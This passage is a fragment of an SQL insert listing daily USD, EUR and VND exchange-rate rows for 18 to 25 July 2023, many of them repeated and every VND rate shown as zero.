(6988, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6989, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-18'),
(6990, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-18'),
(6991, 1, 'USD', 1.000000, 2, 'EUR', 0.890470, '2023-07-18'),
(6992, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6993, 2, 'EUR', 1.000000, 1, 'USD', 1.123000, '2023-07-18'),
(6994, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6995, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-18'),
(6996, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-18'),
(6997, 1, 'USD', 0.000000, 2, 'EUR', 0.890470, '2023-07-18'),
(6998, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-18'),
(6999, 2, 'EUR', 0.000000, 1, 'USD', 1.123000, '2023-07-18'),
(7000, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-18'),
(7001, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-18'),
(7002, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-18'),
(7003, 1, 'USD', 1.000000, 2, 'EUR', 0.890470, '2023-07-18'),
(7004, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-18'),
(7005, 2, 'EUR', 1.000000, 1, 'USD', 1.123000, '2023-07-18'),
(7006, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-18'),
(7007, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-18'),
(7008, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-18'),
(7009, 1, 'USD', 0.000000, 2, 'EUR', 0.890470, '2023-07-18'),
(7010, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-18'),
(7011, 2, 'EUR', 0.000000, 1, 'USD', 1.123000, '2023-07-18'),
(7012, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-18'),
(7013, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-18'),
(7014, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-18'),
(7015, 1, 'USD', 1.000000, 2, 'EUR', 0.890470, '2023-07-19'),
(7016, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7017, 2, 'EUR', 1.000000, 1, 'USD', 1.123000, '2023-07-19'),
(7018, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7019, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-19'),
(7020, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-19'),
(7021, 1, 'USD', 0.000000, 2, 'EUR', 0.888490, '2023-07-19'),
(7022, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7023, 2, 'EUR', 0.000000, 1, 'USD', 1.125500, '2023-07-19'),
(7024, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7025, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-19'),
(7026, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-19'),
(7027, 1, 'USD', 1.000000, 2, 'EUR', 0.888490, '2023-07-19'),
(7028, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7029, 2, 'EUR', 1.000000, 1, 'USD', 1.125500, '2023-07-19'),
(7030, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7031, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-19'),
(7032, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-19'),
(7033, 1, 'USD', 0.000000, 2, 'EUR', 0.888490, '2023-07-19'),
(7034, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7035, 2, 'EUR', 0.000000, 1, 'USD', 1.125500, '2023-07-19'),
(7036, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7037, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-19'),
(7038, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-19'),
(7039, 1, 'USD', 1.000000, 2, 'EUR', 0.888490, '2023-07-19'),
(7040, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7041, 2, 'EUR', 1.000000, 1, 'USD', 1.125500, '2023-07-19'),
(7042, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7043, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-19'),
(7044, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-19'),
(7045, 1, 'USD', 0.000000, 2, 'EUR', 0.888490, '2023-07-19'),
(7046, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7047, 2, 'EUR', 0.000000, 1, 'USD', 1.125500, '2023-07-19'),
(7048, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7049, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-19'),
(7050, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-19'),
(7051, 1, 'USD', 1.000000, 2, 'EUR', 0.888490, '2023-07-19'),
(7052, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7053, 2, 'EUR', 1.000000, 1, 'USD', 1.125500, '2023-07-19'),
(7054, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7055, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-19'),
(7056, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-19'),
(7057, 1, 'USD', 0.000000, 2, 'EUR', 0.888490, '2023-07-19'),
(7058, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7059, 2, 'EUR', 0.000000, 1, 'USD', 1.125500, '2023-07-19'),
(7060, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-19'),
(7061, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-19'),
(7062, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-19'),
(7063, 1, 'USD', 1.000000, 2, 'EUR', 0.888490, '2023-07-20'),
(7064, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7065, 2, 'EUR', 1.000000, 1, 'USD', 1.125500, '2023-07-20'),
(7066, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7067, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-20'),
(7068, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-20'),
(7069, 1, 'USD', 0.000000, 2, 'EUR', 0.891110, '2023-07-20'),
(7070, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7071, 2, 'EUR', 0.000000, 1, 'USD', 1.122200, '2023-07-20'),
(7072, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7073, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-20'),
(7074, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-20'),
(7075, 1, 'USD', 1.000000, 2, 'EUR', 0.891110, '2023-07-20'),
(7076, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7077, 2, 'EUR', 1.000000, 1, 'USD', 1.122200, '2023-07-20'),
(7078, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7079, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-20'),
(7080, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-20'),
(7081, 1, 'USD', 0.000000, 2, 'EUR', 0.891110, '2023-07-20'),
(7082, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7083, 2, 'EUR', 0.000000, 1, 'USD', 1.122200, '2023-07-20'),
(7084, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7085, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-20'),
(7086, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-20'),
(7087, 1, 'USD', 1.000000, 2, 'EUR', 0.891110, '2023-07-20'),
(7088, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7089, 2, 'EUR', 1.000000, 1, 'USD', 1.122200, '2023-07-20'),
(7090, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7091, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-20'),
(7092, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-20'),
(7093, 1, 'USD', 0.000000, 2, 'EUR', 0.891110, '2023-07-20'),
(7094, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7095, 2, 'EUR', 0.000000, 1, 'USD', 1.122200, '2023-07-20'),
(7096, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7097, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-20'),
(7098, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-20'),
(7099, 1, 'USD', 1.000000, 2, 'EUR', 0.891110, '2023-07-20'),
(7100, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7101, 2, 'EUR', 1.000000, 1, 'USD', 1.122200, '2023-07-20'),
(7102, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7103, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-20'),
(7104, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-20'),
(7105, 1, 'USD', 0.000000, 2, 'EUR', 0.891110, '2023-07-20'),
(7106, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7107, 2, 'EUR', 0.000000, 1, 'USD', 1.122200, '2023-07-20'),
(7108, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-20'),
(7109, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-20'),
(7110, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-20'),
(7111, 1, 'USD', 1.000000, 2, 'EUR', 0.891110, '2023-07-21'),
(7112, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7113, 2, 'EUR', 1.000000, 1, 'USD', 1.122200, '2023-07-21'),
(7114, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7115, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-21'),
(7116, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-21'),
(7117, 1, 'USD', 0.000000, 2, 'EUR', 0.893100, '2023-07-21'),
(7118, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7119, 2, 'EUR', 0.000000, 1, 'USD', 1.119700, '2023-07-21'),
(7120, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7121, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-21'),
(7122, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-21'),
(7123, 1, 'USD', 1.000000, 2, 'EUR', 0.893100, '2023-07-21'),
(7124, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7125, 2, 'EUR', 1.000000, 1, 'USD', 1.119700, '2023-07-21'),
(7126, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7127, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-21'),
(7128, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-21'),
(7129, 1, 'USD', 0.000000, 2, 'EUR', 0.893100, '2023-07-21'),
(7130, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7131, 2, 'EUR', 0.000000, 1, 'USD', 1.119700, '2023-07-21'),
(7132, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7133, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-21'),
(7134, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-21'),
(7135, 1, 'USD', 1.000000, 2, 'EUR', 0.893100, '2023-07-21'),
(7136, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7137, 2, 'EUR', 1.000000, 1, 'USD', 1.119700, '2023-07-21'),
(7138, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7139, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-21'),
(7140, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-21'),
(7141, 1, 'USD', 0.000000, 2, 'EUR', 0.893100, '2023-07-21'),
(7142, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7143, 2, 'EUR', 0.000000, 1, 'USD', 1.119700, '2023-07-21'),
(7144, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7145, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-21'),
(7146, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-21'),
(7147, 1, 'USD', 1.000000, 2, 'EUR', 0.893100, '2023-07-21'),
(7148, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7149, 2, 'EUR', 1.000000, 1, 'USD', 1.119700, '2023-07-21'),
(7150, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7151, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-21'),
(7152, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-21'),
(7153, 1, 'USD', 0.000000, 2, 'EUR', 0.893100, '2023-07-21'),
(7154, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7155, 2, 'EUR', 0.000000, 1, 'USD', 1.119700, '2023-07-21'),
(7156, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-21'),
(7157, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-21'),
(7158, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-21'),
(7159, 1, 'USD', 1.000000, 2, 'EUR', 0.893100, '2023-07-22'),
(7160, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7161, 2, 'EUR', 1.000000, 1, 'USD', 1.119700, '2023-07-22'),
(7162, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7163, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-22'),
(7164, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-22'),
(7165, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-22'),
(7166, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7167, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-22'),
(7168, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7169, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-22'),
(7170, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-22'),
(7171, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-22'),
(7172, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7173, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-22'),
(7174, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7175, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-22'),
(7176, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-22'),
(7177, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-22'),
(7178, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7179, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-22'),
(7180, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7181, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-22'),
(7182, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-22'),
(7183, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-22'),
(7184, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7185, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-22'),
(7186, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7187, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-22'),
(7188, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-22'),
(7189, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-22'),
(7190, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7191, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-22'),
(7192, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7193, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-22'),
(7194, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-22'),
(7195, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-22'),
(7196, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7197, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-22'),
(7198, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7199, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-22'),
(7200, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-22'),
(7201, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-22'),
(7202, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7203, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-22'),
(7204, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-22'),
(7205, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-22'),
(7206, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-22'),
(7207, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-23'),
(7208, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7209, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-23'),
(7210, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7211, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-23'),
(7212, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-23'),
(7213, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-23'),
(7214, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7215, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-23'),
(7216, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7217, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-23'),
(7218, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-23'),
(7219, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-23'),
(7220, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7221, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-23'),
(7222, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7223, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-23'),
(7224, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-23'),
(7225, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-23'),
(7226, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7227, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-23'),
(7228, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7229, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-23'),
(7230, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-23'),
(7231, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-23'),
(7232, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7233, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-23'),
(7234, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7235, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-23'),
(7236, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-23'),
(7237, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-23'),
(7238, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7239, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-23'),
(7240, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7241, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-23'),
(7242, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-23'),
(7243, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-23'),
(7244, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7245, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-23'),
(7246, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7247, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-23'),
(7248, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-23'),
(7249, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-23'),
(7250, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7251, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-23'),
(7252, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-23'),
(7253, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-23'),
(7254, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-23'),
(7255, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-24'),
(7256, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7257, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-24'),
(7258, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7259, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-24'),
(7260, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-24'),
(7261, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-24'),
(7262, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7263, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-24'),
(7264, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7265, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-24'),
(7266, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-24'),
(7267, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-24'),
(7268, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7269, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-24'),
(7270, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7271, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-24'),
(7272, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-24'),
(7273, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-24'),
(7274, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7275, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-24'),
(7276, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7277, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-24'),
(7278, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-24'),
(7279, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-24'),
(7280, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7281, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-24'),
(7282, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7283, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-24'),
(7284, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-24'),
(7285, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-24'),
(7286, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7287, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-24'),
(7288, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7289, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-24'),
(7290, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-24'),
(7291, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-24'),
(7292, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7293, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-24'),
(7294, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7295, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-24'),
(7296, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-24'),
(7297, 1, 'USD', 0.000000, 2, 'EUR', 0.899040, '2023-07-24'),
(7298, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7299, 2, 'EUR', 0.000000, 1, 'USD', 1.112300, '2023-07-24'),
(7300, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-24'),
(7301, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-24'),
(7302, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-24'),
(7303, 1, 'USD', 1.000000, 2, 'EUR', 0.899040, '2023-07-25'),
(7304, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7305, 2, 'EUR', 1.000000, 1, 'USD', 1.112300, '2023-07-25'),
(7306, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7307, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-25'),
(7308, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-25'),
(7309, 1, 'USD', 0.000000, 2, 'EUR', 0.901230, '2023-07-25'),
(7310, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7311, 2, 'EUR', 0.000000, 1, 'USD', 1.109600, '2023-07-25'),
(7312, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7313, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-25'),
(7314, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-25'),
(7315, 1, 'USD', 1.000000, 2, 'EUR', 0.901230, '2023-07-25'),
(7316, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7317, 2, 'EUR', 1.000000, 1, 'USD', 1.109600, '2023-07-25'),
(7318, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7319, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-25'),
(7320, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-25'),
(7321, 1, 'USD', 0.000000, 2, 'EUR', 0.901230, '2023-07-25'),
(7322, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7323, 2, 'EUR', 0.000000, 1, 'USD', 1.109600, '2023-07-25'),
(7324, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7325, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-25'),
(7326, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-25'),
(7327, 1, 'USD', 1.000000, 2, 'EUR', 0.901230, '2023-07-25'),
(7328, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7329, 2, 'EUR', 1.000000, 1, 'USD', 1.109600, '2023-07-25'),
(7330, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7331, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-25'),
(7332, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-25'),
(7333, 1, 'USD', 0.000000, 2, 'EUR', 0.901230, '2023-07-25'),
(7334, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7335, 2, 'EUR', 0.000000, 1, 'USD', 1.109600, '2023-07-25'),
(7336, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7337, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-25'),
(7338, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-25'),
